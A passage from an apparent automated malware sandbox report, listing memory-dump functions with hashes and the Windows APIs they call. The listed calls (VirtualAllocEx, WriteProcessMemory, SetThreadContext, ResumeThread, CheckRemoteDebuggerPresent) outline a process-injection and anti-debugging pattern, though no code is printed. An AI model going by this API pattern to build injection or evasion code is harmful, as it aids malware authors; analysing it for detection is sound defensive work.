                                                                                  • Source File: 00000004.00000002.462940910.0000000001FA0000.00000040.00000001.sdmp, Offset: 01FA0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6d1415da974420587c935534560165f3d2e25befff09f3a9e9f5f0c7c4b29081
                                                                                  • Instruction ID: 2564eaff48baf227340d847d148934e62624e87c605e14eb029403d728902f13
                                                                                  • Opcode Fuzzy Hash: 6d1415da974420587c935534560165f3d2e25befff09f3a9e9f5f0c7c4b29081
                                                                                  • Instruction Fuzzy Hash: 87933F70D4922CCFC728EF28E9986ADBBB1FB48300F4185E9D548A3254DB346E95CF65
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 020319A2, Relevance: 2.9, Instructions: 2929COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462998065.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bd4126603f43f6fcb3382e8fcfe6ebe0eec2765098d50a2565daf8ea583f9b55
                                                                                  • Instruction ID: 2c09701cd59e4d273935c70eb342cac224d6847dbe76037d75fc29b88be6852a
                                                                                  • Opcode Fuzzy Hash: bd4126603f43f6fcb3382e8fcfe6ebe0eec2765098d50a2565daf8ea583f9b55
                                                                                  • Instruction Fuzzy Hash: 79533D70E45218CFC728EF28EC946ADBBB5FB88304F4149E9D588A3250DB346EA5CF55
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 01FC929C, Relevance: 2.3, Instructions: 2290COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462960261.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7d5d870ed0c5b0035607fc239222c6b4d02438f4988b702c321a3f4c32acf5c5
                                                                                  • Instruction ID: 248fe2fc4515dd913b803ce85971753619b71ce95f2b1fc77b17b0c971803f65
                                                                                  • Opcode Fuzzy Hash: 7d5d870ed0c5b0035607fc239222c6b4d02438f4988b702c321a3f4c32acf5c5
                                                                                  • Instruction Fuzzy Hash: 3A238C70E4962CCFC724EF28D98465DBBB2EB88304F0289E9D548A3354CB386D95DF65
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00726CD0, Relevance: 1.6, APIs: 1, Instructions: 144processCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateProcessAsUserW.KERNEL32(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 00726E1A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462791178.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateProcessUser
                                                                                  • String ID:
                                                                                  • API String ID: 2217836671-0
                                                                                  • Opcode ID: 2bf6d94ac9ebda0c54a0503b074267e6ddf7d6b3e9f914b580595101d9de4217
                                                                                  • Instruction ID: 608ada0c4e5041986e99e52618df7949e08cfa2d41d14c5a4f8f921229c14cd4
                                                                                  • Opcode Fuzzy Hash: 2bf6d94ac9ebda0c54a0503b074267e6ddf7d6b3e9f914b580595101d9de4217
                                                                                  • Instruction Fuzzy Hash: 24510475D002299FDF24DFA5C840BDEBBB5BF49304F1484AAE808A7250DB359A88CF91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 01FA0006, Relevance: 1.6, Instructions: 1591COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462940910.0000000001FA0000.00000040.00000001.sdmp, Offset: 01FA0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c419a5d103d2769ff2f41202384e381fae3bd8a34f3b8ecc40c8294785b7ddb6
                                                                                  • Instruction ID: db165d801cafdb6fa283b1187ac43e36da372c3e210417b03076f5e247b788ed
                                                                                  • Opcode Fuzzy Hash: c419a5d103d2769ff2f41202384e381fae3bd8a34f3b8ecc40c8294785b7ddb6
                                                                                  • Instruction Fuzzy Hash: 3DF23870D49228CFCB68EF28E8986ADBBB1FB48300F5185E9D548A3254DF346E95CF51
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 041DCAE8, Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CheckRemoteDebuggerPresent.KERNEL32(00000000,?), ref: 041DD84F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.464507377.00000000041D0000.00000040.00000001.sdmp, Offset: 041D0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CheckDebuggerPresentRemote
                                                                                  • String ID:
                                                                                  • API String ID: 3662101638-0
                                                                                  • Opcode ID: 8f18a9e1e7da676a801000dadaf12b8f2d9a5addea1f1532c812b9d7c939c7a2
                                                                                  • Instruction ID: 683817a8e13d23bd9e3dd2fc85bb255a29698940c7f3bb92ab24b378276efe58
                                                                                  • Opcode Fuzzy Hash: 8f18a9e1e7da676a801000dadaf12b8f2d9a5addea1f1532c812b9d7c939c7a2
                                                                                  • Instruction Fuzzy Hash: CD2128B59002198FDB00CF99D884BEEBBF4FF49314F14846AE855B7650D778A944CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 01FD0006, Relevance: 1.5, Instructions: 1508COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462970655.0000000001FD0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4b9a5367ceac1eba017fbcd117c1efbcb709e6bd952de62610b8025cb8190375
                                                                                  • Instruction ID: 294644cd11fd7670f4e10aa029b329e5b4d82588a2c8df810062e72b8caac6ce
                                                                                  • Opcode Fuzzy Hash: 4b9a5367ceac1eba017fbcd117c1efbcb709e6bd952de62610b8025cb8190375
                                                                                  • Instruction Fuzzy Hash: 63E20770D0A218CFCB28EF28E995AADBBB2FB48300F1145E9D54DA3254DB346E95CF51
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 01FB0006, Relevance: 1.5, Instructions: 1500COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462950861.0000000001FB0000.00000040.00000001.sdmp, Offset: 01FB0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: dabf495d95908ef1634d1d437b7326a2a8f40718dd45286dee743680062d4784
                                                                                  • Instruction ID: 11143d9426656951c8683a1d3c2e5a6e5525586eeee3ab47a212979701fdfb58
                                                                                  • Opcode Fuzzy Hash: dabf495d95908ef1634d1d437b7326a2a8f40718dd45286dee743680062d4784
                                                                                  • Instruction Fuzzy Hash: 62E23870D0922CCFCB68EF28E9946ADBBB1FB48300F1185E9D549A3254DB346E95CF51
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0030364F, Relevance: 1.5, Instructions: 1471COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462531853.0000000000300000.00000040.00000001.sdmp, Offset: 00300000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ec7c01c94d8b2efd0bd5ae667d088a2b1102b3316618421869b5dca7eb555763
                                                                                  • Instruction ID: 057894710840238c1e9570ba2c7cb0b6c18d781fabb34045a7ad128147e8a524
                                                                                  • Opcode Fuzzy Hash: ec7c01c94d8b2efd0bd5ae667d088a2b1102b3316618421869b5dca7eb555763
                                                                                  • Instruction Fuzzy Hash: 5EE23D70D06218CFDBA8EF28E994AADBBB1FB48700F1145E9D548A3250DF346E95CF51
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 041DE168, Relevance: 1.3, Instructions: 1326COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.464507377.00000000041D0000.00000040.00000001.sdmp, Offset: 041D0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9ff5959f2a15df8bf24b2dc5732318c0b2c97a1d6790d29b39bb959991c58945
                                                                                  • Instruction ID: 9448f21d0a1e68055f93de9ddd3f985c2880bf1ebcaa689053ba72b977ff1357
                                                                                  • Opcode Fuzzy Hash: 9ff5959f2a15df8bf24b2dc5732318c0b2c97a1d6790d29b39bb959991c58945
                                                                                  • Instruction Fuzzy Hash: 18A29170A19614CFC704BF78D89465EBFB2AF88204F0688B9D589D7391DF386C45CB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00300438, Relevance: 6.0, Strings: 3, Instructions: 2291COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462531853.0000000000300000.00000040.00000001.sdmp, Offset: 00300000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: DmS2$W#w$#w
                                                                                  • API String ID: 0-4063953339
                                                                                  • Opcode ID: be0f656705f4de24231e3aa35ce2c446d7dee7caab6e644876f5b28eae65f1d0
                                                                                  • Instruction ID: 61631163aae414b7e7cd3a92f9ab33ed5fd531e32dcbc01cbcb0c568cedc4775
                                                                                  • Opcode Fuzzy Hash: be0f656705f4de24231e3aa35ce2c446d7dee7caab6e644876f5b28eae65f1d0
                                                                                  • Instruction Fuzzy Hash: 25333A35805518DFCB25BFB8ED5829DBBBAFF49304F4109EAD18966260DF300A98CF56
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00300448, Relevance: 6.0, Strings: 3, Instructions: 2282COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462531853.0000000000300000.00000040.00000001.sdmp, Offset: 00300000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: DmS2$W#w$#w
                                                                                  • API String ID: 0-4063953339
                                                                                  • Opcode ID: 59d95e09584fef45505994a8533e94a2030a01c51eedb4e6b71658697c28408d
                                                                                  • Instruction ID: 9c55e6c07d1daa1c184ad31424c160c39ab52c0b13d2c2078474ce3f14c21b79
                                                                                  • Opcode Fuzzy Hash: 59d95e09584fef45505994a8533e94a2030a01c51eedb4e6b71658697c28408d
                                                                                  • Instruction Fuzzy Hash: 63333A35805518DFCB25BFB8ED5829DBBBAFF49304F4109EAD18966260DF300A98CF56
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00727091, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00727103
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462791178.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID: 3
                                                                                  • API String ID: 4275171209-1842515611
                                                                                  • Opcode ID: cfcb1f775636a91abcd7edd91a73521e28da1ad2fa2f222f090045c4427dd19b
                                                                                  • Instruction ID: b390fc1c140c738958c021b22cea1a70ea7e5dde9e21740a07e73a3f9fb08926
                                                                                  • Opcode Fuzzy Hash: cfcb1f775636a91abcd7edd91a73521e28da1ad2fa2f222f090045c4427dd19b
                                                                                  • Instruction Fuzzy Hash: 0C1104B59042499FCB10CF99D884BDEBFF4FB88314F24881AE928A7650C375A950CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00440DF0, Relevance: 2.5, Strings: 2, Instructions: 21COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462710248.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: F1m$F1m
                                                                                  • API String ID: 0-3588151692
                                                                                  • Opcode ID: 14a80ab0d4bdb71e8ca17653d839ee96117fc38ecee8ace8a4e45173fdf92c33
                                                                                  • Instruction ID: 37c737731d1a353f9ab611f31f77db41680fc13380166592f00c4999b77064da
                                                                                  • Opcode Fuzzy Hash: 14a80ab0d4bdb71e8ca17653d839ee96117fc38ecee8ace8a4e45173fdf92c33
                                                                                  • Instruction Fuzzy Hash: 1AE0C2387001168B5B1CC66D8800453B3DAAFDD62972484BB9509CF326DA31CC318792
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00727140, Relevance: 1.6, APIs: 1, Instructions: 65injectionCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 007271CD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462791178.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: MemoryProcessWrite
                                                                                  • String ID:
                                                                                  • API String ID: 3559483778-0
                                                                                  • Opcode ID: 626d96491661c502d0a94a7ce00179beedd86d087ec18480b5e299b7a3b8ab9e
                                                                                  • Instruction ID: 66f95fd980a8a18e2e52cc251b108912934b307c6ea2892c0ff2a548aa059a29
                                                                                  • Opcode Fuzzy Hash: 626d96491661c502d0a94a7ce00179beedd86d087ec18480b5e299b7a3b8ab9e
                                                                                  • Instruction Fuzzy Hash: 4E2125B19002599FDB10CF99D884BDEBBF4FF88310F10842AE818A3240D378AA50CBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00726F11, Relevance: 1.6, APIs: 1, Instructions: 59threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00726F8F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462791178.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ContextThreadWow64
                                                                                  • String ID:
                                                                                  • API String ID: 983334009-0
                                                                                  • Opcode ID: 2c20594078fc205a130f57f79d5067e86f37c98497556367c25037b3e61cddad
                                                                                  • Instruction ID: e6625a5817202a1ab93a1a03649e299f33544329f3655b4b2843d0a0d57e05b4
                                                                                  • Opcode Fuzzy Hash: 2c20594078fc205a130f57f79d5067e86f37c98497556367c25037b3e61cddad
                                                                                  • Instruction Fuzzy Hash: 652113B19002199FDB10CF99D9847EEFBB4BB48310F14852AE418A3640D778AA54CBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00726FD0, Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0072704E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462791178.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: MemoryProcessRead
                                                                                  • String ID:
                                                                                  • API String ID: 1726664587-0
                                                                                  • Opcode ID: 184243a5d5a546e129785cdcb008e1f81bf066443d9d5ba18e7e00cea10ed4c9
                                                                                  • Instruction ID: 38a420ff6dd6d96bf07cf77ddc19625ab372f49342d34e5cd8abdb9dced65bd1
                                                                                  • Opcode Fuzzy Hash: 184243a5d5a546e129785cdcb008e1f81bf066443d9d5ba18e7e00cea10ed4c9
                                                                                  • Instruction Fuzzy Hash: BE2129759042599FCB10CF9AD884BDEBFF4FB48310F14842AE418A7250C378A544CF61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00726F18, Relevance: 1.6, APIs: 1, Instructions: 58threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00726F8F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462791178.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ContextThreadWow64
                                                                                  • String ID:
                                                                                  • API String ID: 983334009-0
                                                                                  • Opcode ID: a69f097538293be719f3f9c9c269c5d9f7e04321d9454b3fba9d1befb4c004b6
                                                                                  • Instruction ID: bbfcda3a4c894785f4f9e11bd6b130ad6e77b441749f29aa0a0243857c09d29a
                                                                                  • Opcode Fuzzy Hash: a69f097538293be719f3f9c9c269c5d9f7e04321d9454b3fba9d1befb4c004b6
                                                                                  • Instruction Fuzzy Hash: D12106B1D006199FDB00CF9AD9457DEFBB8FB49314F14852AE418B3640D778A9548FA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00726FD8, Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0072704E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462791178.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: MemoryProcessRead
                                                                                  • String ID:
                                                                                  • API String ID: 1726664587-0
                                                                                  • Opcode ID: 6822826fd71205a9f88557941d1ba03a04c14afcdef2173dba1afc4204be4ad8
                                                                                  • Instruction ID: 4356fc17aabcd97343364679e6a4869fc84384a0a15d084dbfbc0f18cdff49a1
                                                                                  • Opcode Fuzzy Hash: 6822826fd71205a9f88557941d1ba03a04c14afcdef2173dba1afc4204be4ad8
                                                                                  • Instruction Fuzzy Hash: 6321E7B59002499FDB10CF9AD844BDEFBF4FB48310F14842AE958A7250D379A654CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 041DCB00, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • OutputDebugStringW.KERNELBASE(00000000), ref: 041DDB48
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.464507377.00000000041D0000.00000040.00000001.sdmp, Offset: 041D0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString
                                                                                  • String ID:
                                                                                  • API String ID: 1166629820-0
                                                                                  • Opcode ID: 8d985d33e3402a125da489f0c46dc08916d494c5a3aaba61f70b68300de0cc80
                                                                                  • Instruction ID: b8a3916a91e55836cbad76dbfdf68a1c0d80cdfd94e3cc8cc7b8d404a640ff01
                                                                                  • Opcode Fuzzy Hash: 8d985d33e3402a125da489f0c46dc08916d494c5a3aaba61f70b68300de0cc80
                                                                                  • Instruction Fuzzy Hash: 461167B1D046099BCB10CF9AE484BDEFBB4FF89314F14852AD818B7200D374A940CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00727098, Relevance: 1.5, APIs: 1, Instructions: 48memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00727103
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462791178.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 4275171209-0
                                                                                  • Opcode ID: dfc4d1bd9fbfeb4d7253288fced773652b3cd0b498bfd7a354b09a8f6c69f137
                                                                                  • Instruction ID: c02d44e500837518fcd3382357fee81562fd43d7fb794aa775bb4ff3fefb93be
                                                                                  • Opcode Fuzzy Hash: dfc4d1bd9fbfeb4d7253288fced773652b3cd0b498bfd7a354b09a8f6c69f137
                                                                                  • Instruction Fuzzy Hash: C011F5B59002599FCB10CF99D844BDEBFF8FF89314F248819E528A7250C379A954CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00727218, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462791178.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ResumeThread
                                                                                  • String ID:
                                                                                  • API String ID: 947044025-0
                                                                                  • Opcode ID: 9ac658a0cc3b982359b692a29f6dcabc9bb9a1c55f833596098a7b02bfdfe839
                                                                                  • Instruction ID: 6ef875b1f68f7b66db2b656c368124b42bef26f798b8adf07ecafb423e2ad5f5
                                                                                  • Opcode Fuzzy Hash: 9ac658a0cc3b982359b692a29f6dcabc9bb9a1c55f833596098a7b02bfdfe839
                                                                                  • Instruction Fuzzy Hash: D91103B5800209CFCB10CF9AD444BDEBBF8EB49314F24881AD418B7240C379A984CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 004400F8, Relevance: 1.3, Strings: 1, Instructions: 41COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462710248.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: fCl
                                                                                  • API String ID: 0-625834680
                                                                                  • Opcode ID: c6078902d228e80209bf149da099986b6315784921d1583ebe96406b76c02dc1
                                                                                  • Instruction ID: f15553583ab88df9f99433f762bb58e014d784dce0ff9f928de4a88efe6428ef
                                                                                  • Opcode Fuzzy Hash: c6078902d228e80209bf149da099986b6315784921d1583ebe96406b76c02dc1
                                                                                  • Instruction Fuzzy Hash: F7F0F634B005118FEB3485598812F27B29B9BC5B11F24803BDA058F344CE72CC2283DB
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00440DD0, Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462710248.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: F1m
                                                                                  • API String ID: 0-2853628499
                                                                                  • Opcode ID: 53d32f6dd53471810a51d856e052a68a4e0440ebf475b82972ff2d91e13992c5
                                                                                  • Instruction ID: f47055012e14c76cedf83f631f7f507a90f12c33f630e692de5d565e52f3a862
                                                                                  • Opcode Fuzzy Hash: 53d32f6dd53471810a51d856e052a68a4e0440ebf475b82972ff2d91e13992c5
                                                                                  • Instruction Fuzzy Hash: 1EF0E57560D3918FDB1786285850B667FA0AFA7108B2D84EBC585CF663D6248C26C313
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 004417D0, Relevance: .1, Instructions: 76COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462710248.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 17099ee14adca952ac2a9da020ec1d5d04c60cf97fc61dd05e4492c14fca5dd6
                                                                                  • Instruction ID: 97df371672248a92699e5be0652873ed92798bff711a044c86d131f0ee4cc29c
                                                                                  • Opcode Fuzzy Hash: 17099ee14adca952ac2a9da020ec1d5d04c60cf97fc61dd05e4492c14fca5dd6
                                                                                  • Instruction Fuzzy Hash: 7821C935B002069BFF209E948841BAB37ABEF89755F24402BED455F364CB358C9297B7
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000AD630, Relevance: .1, Instructions: 75COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462224492.00000000000AD000.00000040.00000001.sdmp, Offset: 000AD000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6b13a99b62bd2aafbc60f0eb5af37e470e8f124111715f5185766510be4504f7
                                                                                  • Instruction ID: e42ab42e3aa1c51a3d213748526bcb97be6b3385787545a1517e19b59d26f72b
                                                                                  • Opcode Fuzzy Hash: 6b13a99b62bd2aafbc60f0eb5af37e470e8f124111715f5185766510be4504f7
                                                                                  • Instruction Fuzzy Hash: 942137B5604244DFDF15CF90E8C0B2ABFA5FB89314F34856AE80A0B646C336D856DBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 001AD01C, Relevance: .1, Instructions: 72COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462241131.00000000001AD000.00000040.00000001.sdmp, Offset: 001AD000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 96285d1e11c00a9ba02bd044eb9b6976d300dd6cac188617a12dc513e820a2ce
                                                                                  • Instruction ID: 35b1d9a0d0aef152cdd07bde7000a418731b7c851d8521dcb6bad81a649e16b1
                                                                                  • Opcode Fuzzy Hash: 96285d1e11c00a9ba02bd044eb9b6976d300dd6cac188617a12dc513e820a2ce
                                                                                  • Instruction Fuzzy Hash: C52137B8204604DFCB14CF20FA80B26BB65EB85714F30C9ADE80A4B646C337D847CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 001AD294, Relevance: .1, Instructions: 72COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462241131.00000000001AD000.00000040.00000001.sdmp, Offset: 001AD000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 57c18d7798edc280bfdf8e1d1a15502cf7d2b6bfc035f78ff43df343015a585b
                                                                                  • Instruction ID: aa7c8a17c256fe80e91570f3b434ceb57b83a7ec001b67d1bf7e61f7cbb9d681
                                                                                  • Opcode Fuzzy Hash: 57c18d7798edc280bfdf8e1d1a15502cf7d2b6bfc035f78ff43df343015a585b
                                                                                  • Instruction Fuzzy Hash: 562107B9604604DFDF04CF50E9C4B26BBA5FF85718F24C9ADD80A4B642C736D846CB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 001AD006, Relevance: .1, Instructions: 63COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462241131.00000000001AD000.00000040.00000001.sdmp, Offset: 001AD000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e8e64c93fba7b8a10d6684723679dd1f38000f3d26e003ecbbccfa9bd2c267b7
                                                                                  • Instruction ID: 524fd46a10479a4da2d992b51c411de64b56412d9c357cb5221c6cc48f2fc804
                                                                                  • Opcode Fuzzy Hash: e8e64c93fba7b8a10d6684723679dd1f38000f3d26e003ecbbccfa9bd2c267b7
                                                                                  • Instruction Fuzzy Hash: 052180754087849FCB02CF24E994715BF71EF46314F28C5EAD8458F667C33A985ACB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00440D04, Relevance: .1, Instructions: 61COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462710248.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c363e296aeb46eb7e29b238e9381b79cd4bb0c7438d31dcbf159fbb3265b67e5
                                                                                  • Instruction ID: ed15319653cfddf594e2cab1e0c55146c4d9f2c3531f83837e42fb73c683c0ac
                                                                                  • Opcode Fuzzy Hash: c363e296aeb46eb7e29b238e9381b79cd4bb0c7438d31dcbf159fbb3265b67e5
                                                                                  • Instruction Fuzzy Hash: 5C11B6607087904FD7269B688864B2B7FF59F87604F0905AFE545CB7A3CA65DC09C3A2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 004419D8, Relevance: .1, Instructions: 58COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.462710248.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 58e5b2d8f1bb50752bba81145ed0dca25dd8aeafa8ff318a12acc89befac78cd
                                                                                  • Instruction ID: b2708e6dc76281acd05bb739dbfff404d6824e8a8d3f3676ccdd11e529c0c6ed
                                                                                  • Opcode Fuzzy Hash: 58e5b2d8f1bb50752bba81145ed0dca25dd8aeafa8ff318a12acc89befac78cd
